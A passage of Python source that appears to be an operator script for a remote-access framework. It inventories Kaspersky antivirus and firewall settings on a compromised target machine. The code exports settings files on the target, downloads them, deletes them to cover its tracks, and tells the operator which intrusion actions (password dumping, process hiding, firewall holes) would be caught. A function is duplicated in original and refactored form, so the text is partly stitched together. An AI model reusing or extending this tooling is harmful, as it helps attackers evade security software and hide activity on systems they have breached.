                # NOTE(review): the only element written without a trailing
                # newline and without xmlScrub (value is one of three fixed
                # strings, so scrubbing is not needed).
                kasXmlFilePtr.write((('<allport_monitoring>' + allPortMonitoring) + '</allport_monitoring>'))
                shared.safePrint('+----------------------------------------------------------------------------------+')
                shared.safePrint('| GENERAL PSP STATUS:                                                              |')
                shared.safePrint('+----------------------------------------------------------------------------------+')
                shared.safePrint(('|      FIREWALL IS:                       %s' % fireWallStatus))
                shared.safePrint(('|      PORT MONITORING ON ALL PORTS IS:   %s' % allPortMonitoring))
                shared.safePrint(('|      FILE SYSTEM MONITORING:            %s' % fileSystemMonitor))
                shared.safePrint(('|      SYSTEM ACCOUNT WATCHING IS:        %s' % sysAccountWatch))
                shared.safePrint(('|      NON-CRITICAL EVENT LOGGING IS:     %s' % logNonCrit))
                shared.safePrint(('|      LOGGING OF REGISTRY EVENTS IS:     %s' % logRegEvents))
                shared.safePrint('+----------------------------------------------------------------------------------+')
            finally:
                kasFilePtr.close()
        finally:
            kasXmlFilePtr.write('</kaspersky_settings>\n')
            kasXmlFilePtr.close()
    return True
def kasVerNine(kasName, kasDescription, kasVersion, kasRoot):
    if re.match('.*ANTI.*', kasName.upper()):
        shared.safePrint(
            '|   IT APPEARS TO BE ANTI-VIRUS ONLY...  YOU DO NOT NEED ME.')
        shared.safePrint(
            '+---------------------------------------------------------------------------------'
        )
        kasFlavor = 'ANTIVIRUS'
    else:
        kasFlavor = 'SECURITY'
        shared.safePrint('|   IT APPEARS TO BE INTERNET SECURITY...')
        logDir = dsz.lp.GetLogsDirectory()
        kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
        shared.safePrint(
            '|   THIS NEW VERSION OF THE KASPERSKY 2010 SCRIPT USES DATA RETRIEVED FROM THE'
        )
        shared.safePrint(
            '|   ACTUAL KASPERSKY PROCESS; IT DOES NOT QUERY THE REGISTRY ANYMORE.'
        )
        shared.safePrint(
            '|   THIS MEANS THAT WE WILL CREATE TWO FILES ON TARGET, DOWNLOAD THEM, AND DELETE'
        )
        shared.safePrint(
            '|   THEM.  PLEASE ENSURE THAT THE SCRIPT REMOVES THE FILES CORRECTLY.'
        )
        shared.safePrint(
            '|   GENERALLY SPEAKING, THESE FILES COMBINED ARE TYPICALLY LESS THAN 250K.'
        )
        shared.safePrint(
            '|   IF THERE IS A GOOD REASON NOT TO CREATE AND DOWNLOAD THESE FILES, PLEASE'
        )
        shared.safePrint(
            '|   QUIT OUT OF THIS SCRIPT AND MANUALLY CHECK REGISTRY SETTINGS.'
        )
        shared.safePrint(
            '+---------------------------------------------------------------------------------'
        )
        dsz.ui.Pause(
            'DO YOU WISH TO CONTINUE AND CREATE/GET THE KASPERSKY SETTINGS FILES? (REQUIRED TO CONTINUE)'
        )
        (tarWinDir, tarSysDir) = dsz.path.windows.GetSystemPaths()
        tarTempDir = (tarWinDir + '\\temp')
        kasOutFile = '~klset.dat'
        dsz.control.echo.Off()
        tempFileName = ''
        for i in range(2):
            if dsz.file.Exists(kasOutFile, tarTempDir):
                shared.safePrint(
                    '+---------------------------------------------------------------------------------'
                )
                shared.safePrint(
                    ('|\t!!!FILE %s\\%s MAY ALREADY EXIST ON TARGET!!!' %
                     (tarTempDir, kasOutFile)))
                shared.safePrint(
                    '|\t!!!SEEK HELP IMMEDIATELY!!!   !!!BAILING FROM SCRIPT!!!'
                )
                shared.safePrint('|\t!!!SEE BELOW DIR COMMAND OUTPUT!!!')
                shared.safePrint(
                    '+---------------------------------------------------------------------------------'
                )
                dsz.control.echo.On()
                dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') + kasOutFile))
                dsz.control.echo.Off()
                return False
            else:
                shared.safePrint(
                    '+---------------------------------------------------------------------------------'
                )
                if dsz.cmd.Run(
                    (((((('run -command "\\"' + kasRoot) +
                         '\\avp.com\\" export rtp \\"') + tarTempDir) + '\\') +
                      kasOutFile) + '\\"" -redirect')):
                    shared.safePrint(
                        ('|    SUCCESSFULLY CREATED %s ON TARGET' %
                         kasOutFile))
                    dsz.cmd.Run(((('foreground get ' + tarTempDir) + '\\') +
                                 kasOutFile), dsz.RUN_FLAG_RECORD)
                    [getFile] = dsz.cmd.data.Get('filelocalname::localname',
                                                 dsz.TYPE_STRING)
                if dsz.cmd.Run(((('del ' + tarTempDir) + '\\') + kasOutFile)):
                    shared.safePrint(
                        ('|    SUCCESSFULLY DELETED %s FROM TARGET' %
                         kasOutFile))
                    if dsz.file.Exists(kasOutFile, tarTempDir):
                        shared.safePrint((
                            'PLEASE CHECK THE STATUS OF THE FILE %s/%s ON TARGET!!!'
                            % (tarTempDir, kasOutFile)))
                    else:
                        shared.safePrint((
                            '|    VERIFIED DELETION OF FILE %s\\%s FROM TARGET'
                            % (tarTempDir, kasOutFile)))
                        if (dsz.cmd.Run(
                            ((('dir ' + tarTempDir) + '\\') + kasOutFile)) !=
                                True):
                            shared.safePrint('DIRECTORY LISTING FAILED')
                        dsz.control.echo.Off()
                else:
                    shared.safePrint(
                        ('FAILED TO DELETE %s FROM TARGET' % kasOutFile))
                    dsz.ui.Pause((
                        '!!! VERIFY THAT THE FILE %s\\%s IS NOT ON TARGET!!!' %
                        (tarTempDir, kasOutFile)))
            kasOutFile = '~klset.txt'
        shared.safePrint(
            '+---------------------------------------------------------------------------------'
        )
        dsz.ui.Pause(
            'PLEASE CHECK THE ABOVE DIRECTORY OUTPUTS TO ENSURE BOTH FILES WERE SUCCESSFULLY DELETED.'
        )
        try:
            kasXmlFilePtr.write('<kaspersky_settings>\n')
            kasXmlFilePtr.write('<vendor>KASPERSKY</vendor>\n')
            kasXmlFilePtr.write(
                (('<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
            kasXmlFilePtr.write((('<description>' + shared.xmlScrub(kasName)) +
                                 '</description>\n'))
            kasXmlFilePtr.write(
                (('<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
            shared.safePrint(
                '+---------------------------------------------------------------------------------'
            )
            shared.safePrint(
                '|  THE SCRIPT HAS IDENTIFIED KASPERSKY VERSION 9 (AKA 2010)...'
            )
            shared.safePrint(
                ((('|  ATTEMPTING TO OPEN FILE: ' + logDir) + '\\GetFiles\\') +
                 getFile))
            kasFilePtr = open(((logDir + '\\GetFiles\\') + getFile))
            fwLevel = 0
            fmLevel = 0
            inRegGuard = 0
            fireWallStatus = 'UNKNOWN'
            allPortMonitoring = 'UNKNOWN'
            fileSystemMonitor = 'UNKNOWN'
            logRegEvents = 'UNKNOWN'
            logNonCrit = 'UNKNOWN'
            sysAccountWatch = 'UNKNOWN'
            try:
                for line in kasFilePtr:
                    if re.match('.*bWatchSystemAccount.*', line):
                        sysAccountWatch = 'ENABLED'
                        if re.match('.*no.*', line):
                            sysAccountWatch = 'DISABLED'
                        kasXmlFilePtr.write(
                            (('<sys_acc_watch>' +
                              shared.xmlScrub(sysAccountWatch)) +
                             '</sys_acc_watch>\n'))
                    if re.match('.*LogFiles.*', line):
                        fileSystemMonitor = 'ENABLED'
                        if re.match('.*no.*', line):
                            fileSystemMonitor = 'DISABLED'
                        kasXmlFilePtr.write(
                            (('<file_sys_logging>' +
                              shared.xmlScrub(fileSystemMonitor)) +
                             '</file_sys_logging>\n'))
                    if re.match('.*LogReg.*', line):
                        logRegEvents = 'ENABLED'
                        if re.match('.*no.*', line):
                            logRegEvents = 'DISABLED'
                        kasXmlFilePtr.write((('<reg_event_logging>' +
                                              shared.xmlScrub(logRegEvents)) +
                                             '</reg_event_logging>\n'))
                    if re.match('.*FullReport.*', line):
                        logNonCrit = 'ENABLED'
                        if re.match('.*no.*', line):
                            logNonCrit = 'DISABLED'
                        kasXmlFilePtr.write((('<noncrit_event_logging>' +
                                              shared.xmlScrub(logNonCrit)) +
                                             '</noncrit_event_logging>\n'))
                    if re.match('.*[+].*Firewall.$.*', line):
                        fwLevel = 1
                    if ((1 == fwLevel) and re.match('.*enabled.*', line)):
                        if re.match('.*no.*', line):
                            fireWallStatus = 'DISABLED'
                        else:
                            fireWallStatus = 'ENABLED'
                        kasXmlFilePtr.write(
                            (('<firewall_status>' +
                              shared.xmlScrub(fireWallStatus)) +
                             '</firewall_status>\n'))
                        fwLevel = 0
                    if re.match('.*AllPorts.*', line):
                        if re.match('.*yes.*', line):
                            allPortMonitoring = 'ENABLED'
                        else:
                            allPortMonitoring = 'DISABLED'
                    if re.match('.*vRuleList_vcontent.*', line):
                        splitFw = line.split(' ')
                        fwActionBlock = splitFw[2]
                    m = re.match('.*?([0-9a-fA-F]{4}07268930.*0801816089).*?',
                                 line)
                    if m:
                        fwRules = m.group(1)
                        shared.lateKasFw(fwRules, kasXmlFilePtr, fwActionBlock)
                    if re.match('.*[+].*Resource.$.*', line):
                        inRegGuard = 1
                    if (re.match('.*Childs_vcontent.*', line)
                            and (inRegGuard == 1)):
                        shared.lateKasRegRules(line, kasXmlFilePtr)
                        inRegGuard = 0
                    if re.match('.*4b4c41707054727573746564.*', line):
                        shared.lateKasAppRules(line, kasXmlFilePtr)
                    if re.match('.*Ports_vcontent.*', line):
                        shared.lateKasPortMon(line, kasXmlFilePtr)
                kasXmlFilePtr.write(
                    (('<allport_monitoring>' + allPortMonitoring) +
                     '</allport_monitoring>'))
                shared.safePrint(
                    '+----------------------------------------------------------------------------------+'
                )
                shared.safePrint(
                    '| GENERAL PSP STATUS:                                                              |'
                )
                shared.safePrint(
                    '+----------------------------------------------------------------------------------+'
                )
                shared.safePrint(
                    ('|      FIREWALL IS:                       %s' %
                     fireWallStatus))
                shared.safePrint(
                    ('|      PORT MONITORING ON ALL PORTS IS:   %s' %
                     allPortMonitoring))
                shared.safePrint(
                    ('|      FILE SYSTEM MONITORING:            %s' %
                     fileSystemMonitor))
                shared.safePrint(
                    ('|      SYSTEM ACCOUNT WATCHING IS:        %s' %
                     sysAccountWatch))
                shared.safePrint(
                    ('|      NON-CRITICAL EVENT LOGGING IS:     %s' %
                     logNonCrit))
                shared.safePrint(
                    ('|      LOGGING OF REGISTRY EVENTS IS:     %s' %
                     logRegEvents))
                shared.safePrint(
                    '+----------------------------------------------------------------------------------+'
                )
            finally:
                kasFilePtr.close()
        finally:
            kasXmlFilePtr.write('</kaspersky_settings>\n')
            kasXmlFilePtr.close()
    return True
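def kasVerNine(kasName, kasDescription, kasVersion, kasRoot):
    """Collect Kaspersky 9 (2010) protection settings into the XML report.

    For an "Internet Security" flavour the live settings are exported with
    ``avp.com export rtp`` into two temp files on target (``~klset.dat``,
    then ``~klset.txt``); each is downloaded, deleted, and its deletion
    verified.  The last file downloaded is then parsed line by line into
    ``<logDir>\\kasperskyfile.xml`` and summarised on the console.  A
    product name containing ``ANTI`` is treated as anti-virus only and
    nothing is collected.

    Args:
        kasName: Product display name; used for the ``ANTI`` check and the
            ``<description>`` element.
        kasDescription: Unused here; kept for signature parity with the
            other ``kasVer*`` handlers.
        kasVersion: Version string written to ``<version>``.
        kasRoot: Install directory that contains ``avp.com``.

    Returns:
        ``False`` if a temp file already exists on target (the script bails
        without touching it) or if no settings file could be retrieved;
        ``True`` otherwise.
    """
    if re.match('.*ANTI.*', kasName.upper()):
        shared.safePrint('|   IT APPEARS TO BE ANTI-VIRUS ONLY...  YOU DO NOT NEED ME.')
        shared.safePrint(_KAS9_RULE)
        return True
    shared.safePrint('|   IT APPEARS TO BE INTERNET SECURITY...')
    logDir = dsz.lp.GetLogsDirectory()
    kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
    shared.safePrint('|   THIS NEW VERSION OF THE KASPERSKY 2010 SCRIPT USES DATA RETRIEVED FROM THE')
    shared.safePrint('|   ACTUAL KASPERSKY PROCESS; IT DOES NOT QUERY THE REGISTRY ANYMORE.')
    shared.safePrint('|   THIS MEANS THAT WE WILL CREATE TWO FILES ON TARGET, DOWNLOAD THEM, AND DELETE')
    shared.safePrint('|   THEM.  PLEASE ENSURE THAT THE SCRIPT REMOVES THE FILES CORRECTLY.')
    shared.safePrint('|   GENERALLY SPEAKING, THESE FILES COMBINED ARE TYPICALLY LESS THAN 250K.')
    shared.safePrint('|   IF THERE IS A GOOD REASON NOT TO CREATE AND DOWNLOAD THESE FILES, PLEASE')
    shared.safePrint('|   QUIT OUT OF THIS SCRIPT AND MANUALLY CHECK REGISTRY SETTINGS.')
    shared.safePrint(_KAS9_RULE)
    dsz.ui.Pause('DO YOU WISH TO CONTINUE AND CREATE/GET THE KASPERSKY SETTINGS FILES? (REQUIRED TO CONTINUE)')
    (tarWinDir, tarSysDir) = dsz.path.windows.GetSystemPaths()
    tarTempDir = (tarWinDir + '\\temp')
    dsz.control.echo.Off()
    # Local name of the most recently downloaded export.  Stays None when
    # every export/get failed; the previous code then hit a NameError on
    # open() instead of reporting the problem.
    getFile = None
    for kasOutFile in ('~klset.dat', '~klset.txt'):
        if dsz.file.Exists(kasOutFile, tarTempDir):
            shared.safePrint(_KAS9_RULE)
            shared.safePrint(('|\t!!!FILE %s\\%s MAY ALREADY EXIST ON TARGET!!!' % (tarTempDir, kasOutFile)))
            shared.safePrint('|\t!!!SEEK HELP IMMEDIATELY!!!   !!!BAILING FROM SCRIPT!!!')
            shared.safePrint('|\t!!!SEE BELOW DIR COMMAND OUTPUT!!!')
            shared.safePrint(_KAS9_RULE)
            dsz.control.echo.On()
            dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') + kasOutFile))
            dsz.control.echo.Off()
            # Do not leak the (still empty) report handle on the bail-out path.
            kasXmlFilePtr.close()
            return False
        shared.safePrint(_KAS9_RULE)
        # NOTE(review): kasRoot and tarTempDir come from the target and are
        # spliced into a quoted command line by concatenation; a quote in
        # either would break the quoting below.  Left as-is, flagged.
        exportCmd = (((((('run -command "\\"' + kasRoot) + '\\avp.com\\" export rtp \\"') + tarTempDir) + '\\') + kasOutFile) + '\\"" -redirect')
        if dsz.cmd.Run(exportCmd):
            shared.safePrint(('|    SUCCESSFULLY CREATED %s ON TARGET' % kasOutFile))
            dsz.cmd.Run(((('foreground get ' + tarTempDir) + '\\') + kasOutFile), dsz.RUN_FLAG_RECORD)
            [getFile] = dsz.cmd.data.Get('filelocalname::localname', dsz.TYPE_STRING)
        if dsz.cmd.Run(((('del ' + tarTempDir) + '\\') + kasOutFile)):
            shared.safePrint(('|    SUCCESSFULLY DELETED %s FROM TARGET' % kasOutFile))
            if dsz.file.Exists(kasOutFile, tarTempDir):
                shared.safePrint(('PLEASE CHECK THE STATUS OF THE FILE %s/%s ON TARGET!!!' % (tarTempDir, kasOutFile)))
            else:
                shared.safePrint(('|    VERIFIED DELETION OF FILE %s\\%s FROM TARGET' % (tarTempDir, kasOutFile)))
                # A failing 'dir' here is the expected outcome (file gone);
                # only an unexpected success is left silent, as before.
                if (dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') + kasOutFile)) != True):
                    shared.safePrint('DIRECTORY LISTING FAILED')
                dsz.control.echo.Off()
        else:
            shared.safePrint(('FAILED TO DELETE %s FROM TARGET' % kasOutFile))
            dsz.ui.Pause(('!!! VERIFY THAT THE FILE %s\\%s IS NOT ON TARGET!!!' % (tarTempDir, kasOutFile)))
    shared.safePrint(_KAS9_RULE)
    dsz.ui.Pause('PLEASE CHECK THE ABOVE DIRECTORY OUTPUTS TO ENSURE BOTH FILES WERE SUCCESSFULLY DELETED.')
    try:
        kasXmlFilePtr.write('<kaspersky_settings>\n')
        kasXmlFilePtr.write('<vendor>KASPERSKY</vendor>\n')
        kasXmlFilePtr.write((('<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
        kasXmlFilePtr.write((('<description>' + shared.xmlScrub(kasName)) + '</description>\n'))
        kasXmlFilePtr.write((('<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
        shared.safePrint(_KAS9_RULE)
        shared.safePrint('|  THE SCRIPT HAS IDENTIFIED KASPERSKY VERSION 9 (AKA 2010)...')
        if getFile is None:
            shared.safePrint('!!! NO SETTINGS FILE WAS RETRIEVED FROM TARGET; NOTHING TO PARSE !!!')
            return False
        # Only the last successful download is parsed; if the .txt export
        # failed but the .dat one succeeded this is still the .dat file.
        localExport = ((logDir + '\\GetFiles\\') + getFile)
        shared.safePrint(('|  ATTEMPTING TO OPEN FILE: ' + localExport))
        kasFilePtr = open(localExport)
        try:
            status = _kasNineParseExport(kasFilePtr, kasXmlFilePtr)
            kasXmlFilePtr.write((('<allport_monitoring>' + status['allPortMonitoring']) + '</allport_monitoring>'))
            _kasNinePrintStatus(status)
        finally:
            kasFilePtr.close()
    finally:
        kasXmlFilePtr.write('</kaspersky_settings>\n')
        kasXmlFilePtr.close()
    return True


# Horizontal rule used by the Kaspersky 9 console output.
_KAS9_RULE = '+---------------------------------------------------------------------------------'


def _kasNineParseExport(kasFilePtr, kasXmlFilePtr):
    """Scan one exported settings file and emit per-setting XML as it goes.

    Args:
        kasFilePtr: Open, readable handle on the downloaded export.
        kasXmlFilePtr: Open, writable handle on the XML report.

    Returns:
        Dict with the summary flags ``fireWallStatus``,
        ``allPortMonitoring``, ``fileSystemMonitor``, ``logRegEvents``,
        ``logNonCrit`` and ``sysAccountWatch``, each one of
        ``'ENABLED'`` / ``'DISABLED'`` / ``'UNKNOWN'``.
    """
    status = {
        'fireWallStatus': 'UNKNOWN',
        'allPortMonitoring': 'UNKNOWN',
        'fileSystemMonitor': 'UNKNOWN',
        'logRegEvents': 'UNKNOWN',
        'logNonCrit': 'UNKNOWN',
        'sysAccountWatch': 'UNKNOWN',
    }
    fwLevel = 0
    inRegGuard = 0
    # Action for the firewall rule list; initialised so a rule blob that
    # precedes the vRuleList_vcontent line no longer raises NameError.
    fwActionBlock = ''
    for line in kasFilePtr:
        # Each of these keywords is assumed to appear on a line whose
        # yes/no token gives the setting state -- TODO confirm against a
        # real export; 'no' is matched anywhere on the line.
        if re.match('.*bWatchSystemAccount.*', line):
            status['sysAccountWatch'] = 'ENABLED'
            if re.match('.*no.*', line):
                status['sysAccountWatch'] = 'DISABLED'
            kasXmlFilePtr.write((('<sys_acc_watch>' + shared.xmlScrub(status['sysAccountWatch'])) + '</sys_acc_watch>\n'))
        if re.match('.*LogFiles.*', line):
            status['fileSystemMonitor'] = 'ENABLED'
            if re.match('.*no.*', line):
                status['fileSystemMonitor'] = 'DISABLED'
            kasXmlFilePtr.write((('<file_sys_logging>' + shared.xmlScrub(status['fileSystemMonitor'])) + '</file_sys_logging>\n'))
        if re.match('.*LogReg.*', line):
            status['logRegEvents'] = 'ENABLED'
            if re.match('.*no.*', line):
                status['logRegEvents'] = 'DISABLED'
            kasXmlFilePtr.write((('<reg_event_logging>' + shared.xmlScrub(status['logRegEvents'])) + '</reg_event_logging>\n'))
        if re.match('.*FullReport.*', line):
            status['logNonCrit'] = 'ENABLED'
            if re.match('.*no.*', line):
                status['logNonCrit'] = 'DISABLED'
            kasXmlFilePtr.write((('<noncrit_event_logging>' + shared.xmlScrub(status['logNonCrit'])) + '</noncrit_event_logging>\n'))
        # The 'enabled' line that follows a '+ ... Firewall' header is the
        # firewall on/off switch.
        if re.match('.*[+].*Firewall.$.*', line):
            fwLevel = 1
        if ((1 == fwLevel) and re.match('.*enabled.*', line)):
            if re.match('.*no.*', line):
                status['fireWallStatus'] = 'DISABLED'
            else:
                status['fireWallStatus'] = 'ENABLED'
            kasXmlFilePtr.write((('<firewall_status>' + shared.xmlScrub(status['fireWallStatus'])) + '</firewall_status>\n'))
            fwLevel = 0
        if re.match('.*AllPorts.*', line):
            if re.match('.*yes.*', line):
                status['allPortMonitoring'] = 'ENABLED'
            else:
                status['allPortMonitoring'] = 'DISABLED'
        if re.match('.*vRuleList_vcontent.*', line):
            splitFw = line.split(' ')
            fwActionBlock = splitFw[2]
        # Hex-encoded firewall rule blob; the byte markers are those the
        # original author matched on -- their meaning is not documented here.
        m = re.match('.*?([0-9a-fA-F]{4}07268930.*0801816089).*?', line)
        if m:
            shared.lateKasFw(m.group(1), kasXmlFilePtr, fwActionBlock)
        if re.match('.*[+].*Resource.$.*', line):
            inRegGuard = 1
        if (re.match('.*Childs_vcontent.*', line) and (inRegGuard == 1)):
            shared.lateKasRegRules(line, kasXmlFilePtr)
            inRegGuard = 0
        if re.match('.*4b4c41707054727573746564.*', line):
            shared.lateKasAppRules(line, kasXmlFilePtr)
        if re.match('.*Ports_vcontent.*', line):
            shared.lateKasPortMon(line, kasXmlFilePtr)
    return status


def _kasNinePrintStatus(status):
    """Print the GENERAL PSP STATUS box from the flags gathered by parsing."""
    box = '+----------------------------------------------------------------------------------+'
    shared.safePrint(box)
    shared.safePrint('| GENERAL PSP STATUS:                                                              |')
    shared.safePrint(box)
    shared.safePrint(('|      FIREWALL IS:                       %s' % status['fireWallStatus']))
    shared.safePrint(('|      PORT MONITORING ON ALL PORTS IS:   %s' % status['allPortMonitoring']))
    shared.safePrint(('|      FILE SYSTEM MONITORING:            %s' % status['fileSystemMonitor']))
    shared.safePrint(('|      SYSTEM ACCOUNT WATCHING IS:        %s' % status['sysAccountWatch']))
    shared.safePrint(('|      NON-CRITICAL EVENT LOGGING IS:     %s' % status['logNonCrit']))
    shared.safePrint(('|      LOGGING OF REGISTRY EVENTS IS:     %s' % status['logRegEvents']))
    shared.safePrint(box)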
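def kasVerSix(kasName, kasDescription, kasVersion, kasRoot):
    """Quick registry-based review of Kaspersky 6 for Windows Workstations.

    Queries a fixed set of values under
    ``HKLM\\software\\Kasperskylab\\avp6\\profiles`` with DSZ
    ``registryquery``, prints a SETTING / VALUE / STATUS table, records the
    same data as ``<setting>`` elements in ``<logDir>\\kasperskyfile.xml``,
    dumps the per-port traffic-monitor table and finishes with the list of
    actions the enabled protections would catch.

    Args:
        kasName: Product name written to ``<description>``.
        kasDescription: Unused here; kept for signature parity with the
            other ``kasVer*`` handlers.
        kasVersion: Version string written to ``<version>``.
        kasRoot: Install path written to ``<root>``.

    Returns:
        ``True`` always; failed queries are only printed.
    """
    doNotRun = '|   YAK'
    logDir = dsz.lp.GetLogsDirectory()
    kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
    # The closing tag and close() now run unconditionally; previously the
    # handle was never closed and the closing tag was only written when the
    # port-monitoring query succeeded, leaving a truncated XML document.
    try:
        kasXmlFilePtr.write('<kaspersky_settings>\n')
        kasXmlFilePtr.write('\t<vendor>KASPERSKY</vendor>\n')
        kasXmlFilePtr.write((('\t<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
        kasXmlFilePtr.write((('\t<description>' + shared.xmlScrub(kasName)) + '</description>\n'))
        kasXmlFilePtr.write((('\t<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
        shared.safePrint(_KAS6_RULE)
        shared.safePrint('|   THE SCRIPT HAS IDENTIFIED KASPERSKY VERSION 6 FOR WINDOWS WORKSTATIONS.')
        shared.safePrint('|   THIS VERSION OF THE KASPERSKY SCRIPT USES REGISTRY QUERIES, BUT IS ONLY')
        shared.safePrint('|   A QUICK AND DIRTY REVIEW OF THE SETTINGS.')
        shared.safePrint(_KAS6_TABLE_RULE)
        dsz.control.echo.Off()
        shared.safePrint(('|   %s   %s %s' % (shared.padOutput(30, 'SETTING'), '| VALUE', '|   STATUS')))
        shared.safePrint(_KAS6_TABLE_RULE)
        # Full recursive dump first; its output is left to the DSZ log, the
        # individual values below are what gets tabulated.
        if (not dsz.cmd.Run('registryquery -hive l -key ' + _KAS6_PROFILES_KEY + ' -recursive')):
            shared.safePrint('!!!RECURSIVE REGISTRY QUERY FAILED!!!')
        _kasSixBinarySetting('\\Behavior_Blocking', 'enabled', 'BEHAVIOR BLOCKING:', kasXmlFilePtr)
        _kasSixBinarySetting('\\Anti_Hacker\\profiles\\fw', 'enabled', 'FIREWALL STATUS:', kasXmlFilePtr)
        _kasSixFirewallLevel(kasXmlFilePtr)
        _kasSixBinarySetting(_KAS6_PDM_SETTINGS, 'bWatchSystemAccount', 'SYSTEM ACCOUNT WATCHING:', kasXmlFilePtr)
        _kasSixBinarySetting(_KAS6_PDM_SETTINGS, 'bBehaviourEnabled', 'APP ACTIVITY MONITOR:', kasXmlFilePtr)
        # The three protections below each add a line to the "do not run"
        # warning when enabled ('1').
        if (_kasSixBinarySetting(_KAS6_PDM_SETTINGS, 'bRegMonitoring_Enabled', 'REGISTRY MONITOR:', kasXmlFilePtr) == '1'):
            doNotRun = (doNotRun + '\n|   POKING HOLES IN THE FIREWALL')
        _kasSixBinarySetting(_KAS6_PDM_SETTINGS + '\\Set\\0000', 'bEnabled', 'DANGEROUS BEHAVIOR MONITOR:', kasXmlFilePtr)
        if (_kasSixBinarySetting(_KAS6_PDM_SETTINGS + '\\Set\\0002', 'bEnabled', 'PROCESS INJECTION PROTECTION:', kasXmlFilePtr) == '1'):
            doNotRun = (doNotRun + '\n|   RUNASCHILD, RUNASSYSTEM, PWDUMP, OR MODIFYAUDIT')
        if (_kasSixBinarySetting(_KAS6_PDM_SETTINGS + '\\Set\\0003', 'bEnabled', 'PROCESS HIDING PROTECTION:', kasXmlFilePtr) == '1'):
            doNotRun = (doNotRun + '\n|   HIDING PROCESSES')
        _kasSixBinarySetting(_KAS6_PDM_SETTINGS + '\\Set\\0007', 'bEnabled', 'KEYLOGGER DETECTION:', kasXmlFilePtr)
        _kasSixBinarySetting('\\Web_Monitoring\\profiles\\httpscan\\', 'enabled', 'HTTP PORT LOGGING:', kasXmlFilePtr)
        _kasSixBinarySetting('\\TrafficMonitor\\settings\\', 'DecodeSSL', 'DECODE SSL:', kasXmlFilePtr)
        _kasSixPortMonitoring(kasXmlFilePtr)
        shared.safePrint('| !!!WARNING!!! BASED ON THE ABOVE SETTINGS, DOING THE FOLLOWING WOULD BE STUPID:')
        shared.safePrint(_KAS6_RULE)
        shared.safePrint(doNotRun)
        shared.safePrint(_KAS6_RULE)
    finally:
        kasXmlFilePtr.write('</kaspersky_settings>\n')
        kasXmlFilePtr.close()
    return True


# Registry key (under HKLM) that holds the avp6 profile settings, and the
# sub-key with the proactive-defence (pdm) switches.
_KAS6_PROFILES_KEY = 'software\\Kasperskylab\\avp6\\profiles'
_KAS6_PDM_SETTINGS = '\\Behavior_Blocking\\profiles\\pdm\\settings'

# Console rules used by the Kaspersky 6 output.
_KAS6_RULE = '+---------------------------------------------------------------------------------'
_KAS6_TABLE_RULE = '+------------------------------------+-------+------------------------------------'

# Firewall protection level: registry value -> (console text, XML text).
# The "THIS IS BAD" labels are the original author's assessment.
_KAS6_FW_LEVELS = {
    '1': ('!!!HIGH SECURITY!!! (THIS IS BAD)', 'High Security'),
    '2': ('!!!TRAINING MODE!!! (THIS IS BAD)', 'Training Mode'),
    '3': ('LOW SECURITY', 'Low Security'),
    '4': ('OFF', 'off'),
}


def _kasSixRegQuery(subKey, valueName):
    """Build the DSZ ``registryquery`` command for one value under the avp6 profiles key."""
    return ('registryquery -hive l -key ' + _KAS6_PROFILES_KEY + subKey + ' -value ' + valueName)


def _kasSixBinarySetting(subKey, valueName, regLabel, kasXmlFilePtr):
    """Query one 0/1 registry value, print and record it via ``outputBinData``.

    Returns:
        The raw value string returned by ``shared.basicRegquery`` so callers
        can test it (``'1'`` means enabled).
    """
    regValue = shared.basicRegquery(_kasSixRegQuery(subKey, valueName))
    outputBinData(regLabel, regValue, kasXmlFilePtr)
    return regValue


def _kasSixFirewallLevel(kasXmlFilePtr):
    """Query and report the Anti-Hacker firewall protection level (1-4)."""
    regValue = shared.basicRegquery(_kasSixRegQuery('\\Anti_Hacker\\profiles\\fw\\settings', 'protectionlevel'))
    kasXmlFilePtr.write('\t<setting>\n\t\t<setting_name>Firewall Protection Level</setting_name>\n')
    if regValue in _KAS6_FW_LEVELS:
        (consoleText, xmlText) = _KAS6_FW_LEVELS[regValue]
        shared.safePrint(('|   FIREWALL PROTECTION:             |   %s   |   %s' % (regValue, consoleText)))
        kasXmlFilePtr.write((('\t\t<setting_value>' + xmlText) + '</setting_value>\n\t</setting>\n'))
    else:
        kasXmlFilePtr.write('\t\t<setting_value>Unknown</setting_value>\n\t</setting>\n')
        shared.safePrint(('FIREWALL PROTECTION:                 |   %s   |   (!!!UNKNOWN!!!)' % regValue))


def _kasSixPortMonitoring(kasXmlFilePtr):
    """Dump the traffic-monitor port table to the console and the XML report.

    Returns:
        ``False`` if the recursive registry query failed (nothing written),
        ``True`` otherwise.
    """
    shared.safePrint(_KAS6_TABLE_RULE)
    shared.safePrint('|    PORT MONITORING:')
    regGetCmd = 'registryquery -hive l -key ' + _KAS6_PROFILES_KEY + '\\TrafficMonitor\\settings\\def\\ports\\ -recursive'
    if not dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD):
        shared.safePrint('PORT MONITORING REGISTRY QUERY FAILED')
        return False
    regName = dsz.cmd.data.Get('key::value::name', dsz.TYPE_STRING)
    regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
    portHeader = '|      +--------+----------------------+---------+'
    shared.safePrint(portHeader)
    shared.safePrint('|      | PORT   |    DESCRIPTION       |MONITORED|')
    shared.safePrint(portHeader)
    kasXmlFilePtr.write('\t<monitored_ports>\n')
    for (i, name) in enumerate(regName):
        if (name != 'enabled'):
            continue
        # Assumes each port's values are listed as port, description,
        # <one more value>, enabled, so the port and description sit three
        # and two entries before 'enabled'.  For i < 3 the negative index
        # silently wraps to the end of the list -- TODO confirm the layout
        # against a live listing before tightening this.
        portValue = regValue[(i - 3)]
        portDesc = regValue[(i - 2)]
        if (regValue[i] == '1'):
            portEnabled = 'TRUE'
            kasXmlFilePtr.write((('\t\t<monitored_port>' + portValue) + '</monitored_port>\n'))
        else:
            portEnabled = 'FALSE'
        # ljust pads to the column width and leaves longer values untouched,
        # exactly as the former space-appending loops did.
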